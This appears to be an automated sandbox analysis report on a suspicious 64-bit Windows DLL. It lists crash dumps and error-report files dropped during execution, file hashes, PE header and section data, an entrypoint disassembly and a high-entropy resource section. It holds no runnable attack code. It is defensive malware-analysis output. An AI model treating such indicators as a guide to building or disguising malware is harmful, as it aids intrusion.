                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER826B.tmp.dmp

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:04 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):46780
                                                                                                                                                                                                                      Entropy (8bit):1.4455306649150355
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:k5F8KOMT/4MmS5HuS4bz+++zSGncL1+Ie:hV0/lf5H3494CI3
                                                                                                                                                                                                                      MD5:554187D2D452FB77E3802B525B552AE0
                                                                                                                                                                                                                      SHA1:0D1AFF52C1A24A73C65DCEC234ED06B7BF98C75F
                                                                                                                                                                                                                      SHA-256:581989EC2DF32E60C7F01676358110F66CABCDDDCF497E792B9082CEB233055B
                                                                                                                                                                                                                      SHA-512:6D11C356CBCC75BD376EC3CD1708AED61043BEFA4039D56169A5A624C23CA48BFEB3B494BC65FEAEBEA475E96CD5BB4D9DAD1BDE7CE2774AFD4712CB49A20237
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:MDMP..a..... .......0..f.........................................(..........T.......8...........T...........................|...........h...............................................................................eJ..............Lw......................T.........../..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER82AA.tmp.dmp

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:04 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):55852
                                                                                                                                                                                                                      Entropy (8bit):1.6107554078755504
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:kr8/KOMNV1SjPStFT/F2449pa0SkSDvPWOK:RtsVMjPm5F/4ChDvv
                                                                                                                                                                                                                      MD5:849DEE7EB121FB9FE9F03D5FB32020EB
                                                                                                                                                                                                                      SHA1:E296DF7D08675B52F5402092F88BD49DB7039FBF
                                                                                                                                                                                                                      SHA-256:421CA0FF6B055B5C41005AE12D67B10FE7DDDA0E5098655F0D5046ACCC2349AA
                                                                                                                                                                                                                      SHA-512:E38E668A839C58D658B7CE714A7CBD8021DE151B6E964587DA611CC6ED005B20B86EA4080DC80C391B506AD6720F1EE21398C3C0CEE945E99EA96EAF1819772A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:MDMP..a..... .......0..f.........................................(..........T.......8...........T...............$...........|...........h...............................................................................eJ..............Lw......................T.........../..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8385.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8892
                                                                                                                                                                                                                      Entropy (8bit):3.7043833394305232
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJIAeUCz6YEOQs5JgmfI3ZApDu89boXjfo1Ym:R6lXJneUQ6YEDs5JgmfI3kozfof
                                                                                                                                                                                                                      MD5:9DF31998EF74829F07568A4843055537
                                                                                                                                                                                                                      SHA1:B0E27DCD732E28C59E94D5014ACF04C90ACD0F69
                                                                                                                                                                                                                      SHA-256:78D590A89DFF96B279B8A1214B91C6C4E34D4AE88DD8802C3A0B0232800C770C
                                                                                                                                                                                                                      SHA-512:7A5BD316CE84C2E6606A1715AFE87FE0EB4FC07554CD201CBD04D6C3CD766F07C830FE5F5585CB6B0B66911EE3E1601C52E305DB656D6C909B72DF43A54B44A4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.9.6.<./.P.i.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8395.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8780
                                                                                                                                                                                                                      Entropy (8bit):3.7067724462814247
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJOoPUB6YEOQ65Jgmf19Tpr989bo7jfDYm:R6lXJ5PUB6YED65Jgmf19Uo/fZ
                                                                                                                                                                                                                      MD5:45EF2E64D232A9EB737669670F4902D6
                                                                                                                                                                                                                      SHA1:4D7AB65F31DF36311DFDB4400AC261C6CC10147C
                                                                                                                                                                                                                      SHA-256:15D15F1489EB0FD664617C879534315CCD49E4E2FFA7813A37741CCB172513BC
                                                                                                                                                                                                                      SHA-512:91BC7581D906A79B3A38B21A3480D024A44845A1A5372B20DC7AB67DC770788C2E429848CAFFBE0CADBC40C3656F4AF94B2676BEC467DAC9E88CA6860FEF61E7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.2.0.<./.P.i.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER83D5.tmp.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4794
                                                                                                                                                                                                                      Entropy (8bit):4.4908688384737685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYcYm8M4JCECydFcyq85muIptSTSOd:uIjfwwI7FQ7VMJ85poOOd
                                                                                                                                                                                                                      MD5:CC5C990C0CE16F846DAF0A6CDC8EEBA8
                                                                                                                                                                                                                      SHA1:9AF812000D0BE7B3A6B87FCC2CDA1CEF75289F1F
                                                                                                                                                                                                                      SHA-256:DE8787F5DC592370D64A51CD99DBA9FD2E4267A1C24195A8112C7152723927E8
                                                                                                                                                                                                                      SHA-512:29853EB95758A6F05A9573CC55238F938B8A15C56EB97789ECA868EF3FBDA14FA0D943B70179FC38A50130F9D2942D835F8E19DEFC6812CA46E49E358ADDFDEF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER83E4.tmp.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4941
                                                                                                                                                                                                                      Entropy (8bit):4.508338811786524
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYHYm8M4JCECyTOXFGiyq8vhyTODptSTSQd:uIjfwwI7FQ7VHJLCWGopoOQd
                                                                                                                                                                                                                      MD5:AE1F43150139907FD50E5F9F8C5DDCDE
                                                                                                                                                                                                                      SHA1:4B28573E9E52B9DB3E2448EBD294F1AF71E66036
                                                                                                                                                                                                                      SHA-256:0156EA178C51D92716FF3E7DEDD3F27955C674CE1BA9E5C2A9168F358F16D520
                                                                                                                                                                                                                      SHA-512:273C9E3FF07665D0CC1BD754E86AF024218215419CB5BBC27B831F7CD2AC2D697B6C32C869DF96243945BC8B8C9B45656B502324986E69A3829B428514EA43C2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                      Entropy (8bit):4.394706535925689
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:Fl4fiJoH0ncNXiUjt10qCG/gaocYGBoaUMMhA2NX4WABlBuNAfOBSqa:b4vFCMYQUMM6VFYSfU
                                                                                                                                                                                                                      MD5:85F6B0FFD5794480B2795A7A5CCE4C2E
                                                                                                                                                                                                                      SHA1:E9A23DE5B5E6B3CDFA981AEA95B224775F053539
                                                                                                                                                                                                                      SHA-256:38D311305E96D3A212FF619D9C920E0C1BEA8D319E039C1BBA56B03F75804888
                                                                                                                                                                                                                      SHA-512:C7CF25B0C6F8348FB42876BD31E37B72C4B1489214617AF7A600B095D5C1D1CCA32FCB2ED53781321A3D464DC0D0600A05296E9EE4C3DB138DFC8ACBD466CA1C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm>.fV................................................................................................................................................................................................................................................................................................................................................\.qb........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Entropy (8bit):7.207925663165308
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                                                                                      File name:vierm_soft_x64.dll.dll
                                                                                                                                                                                                                      File size:767'488 bytes
                                                                                                                                                                                                                      MD5:b1ca25f5bb4edd293b3711c77eb99a6f
                                                                                                                                                                                                                      SHA1:178bba8686ea329b884a652fe0f8a0ae0c53d367
                                                                                                                                                                                                                      SHA256:97a6331239d451d7dfe15bfe17de8b419df741ae68bacd440808f8b8d3f99b8a
                                                                                                                                                                                                                      SHA512:d5a282a8f81e117b79616c44a260d89c7fee06f4ac1387675bc79c3bd7599a5d49fbe3d8fb3d4d42eea81a17564abc2d42288bc2dc468d1b16ed633ba421b32d
                                                                                                                                                                                                                      SSDEEP:12288:/h/M5nsxW5fFcrGn7Q21Svj07MGpmeSM6q4LWYv1AoMJPPyogk31OkRK1OKeQeq:/rD+JPPn8kM1Oej
                                                                                                                                                                                                                      TLSH:6FF4BF17B3A016F0E477D23ACA638E56FAF1F8194720AB9703D4457A5F233A05A7E316
                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................Y........................G.......G.......G......Y.......Y.......Y........G.......G.......G.......G......Rich...

                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                      Icon Hash:7ae282899bbab082

                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Entrypoint:0x1800059a0
                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                      Imagebase:0x180000000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT
                                                                                                                                                                                                                      Time Stamp:0x66D197BD [Fri Aug 30 09:58:21 2024 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                      Import Hash:d3f19c8462acea3b286599d6db4d7d49

                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                      Signature Valid:
                                                                                                                                                                                                                      Signature Issuer:
                                                                                                                                                                                                                      Signature Validation Error:
                                                                                                                                                                                                                      Error Number:
                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                          Version:
                                                                                                                                                                                                                          Thumbprint MD5:
                                                                                                                                                                                                                          Thumbprint SHA-1:
                                                                                                                                                                                                                          Thumbprint SHA-256:
                                                                                                                                                                                                                          Serial:

                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          dec esp
                                                                                                                                                                                                                          mov dword ptr [esp+18h], eax
                                                                                                                                                                                                                          mov dword ptr [esp+10h], edx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 18h
                                                                                                                                                                                                                          mov eax, dword ptr [esp+28h]
                                                                                                                                                                                                                          mov dword ptr [esp], eax
                                                                                                                                                                                                                          cmp dword ptr [esp], 01h
                                                                                                                                                                                                                          je 00007F6B447F3384h
                                                                                                                                                                                                                          jmp 00007F6B447F338Eh
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov eax, dword ptr [esp+20h]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [000709DBh], eax
                                                                                                                                                                                                                          mov eax, 00000001h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 18h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 38h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov ecx, 00000004h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov eax, 00001000h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov edx, dword ptr [esp+40h]
                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                          call dword ptr [00059616h]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+20h], eax
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov eax, dword ptr [esp+20h]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 38h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov eax, 00008000h
                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov ecx, dword ptr [esp+30h]
                                                                                                                                                                                                                          call dword ptr [000595CCh]
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+10h], edx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          sub esp, 78h
                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                          mov eax, 00000030h
                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                          lea edx, dword ptr [esp+00h]

                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x71ec00x7c.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x71f3c0x28.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x43658.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x770000x43e0.pdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x77e480x2ae0.pdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xbfc.reloc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x6bac00x70.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6b9800x140.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x5f0000x2c8.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                          .text0x10000x5d4300x5d600f43a6c57e01f650d32296d61179a38acFalse0.38046456659973227data6.435385904060212IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rdata0x5f0000x138800x13a00c836ba80b7dbeff7fbaafd67c248d71cFalse0.33770402070063693data4.904622064540347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .data0x730000x34880x16004cc463ba256074f0958932d503e4ff11False0.27183948863636365data3.2682578107497506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .pdata0x770000x43e00x44005fcb7922b16d53ed29bb4546ae76ab14False0.5199908088235294data5.839976526132865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          memcpy_0x7c0000x1080x2007cc962e1169cff2db25b02cd1fd7336dFalse0.314453125data1.882359889865335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          _RDATA0x7d0000x1f40x200c4640c710b0a9d40f7ffe8a09755e862False0.533203125data4.170309507475893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rsrc0x7e0000x436580x43800f37d386203e2a88b03aed287db6c8adbFalse0.9627712673611111data7.9878717901772145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .reloc0xc20000xbfc0xc004e41657c3e5d7264ce75ff68c9b05721False0.3785807291666667data5.42143048602152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                          RT_DLGINCLUDE0x7e0580x43600data0.9643364448051948

                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                          DLLImport
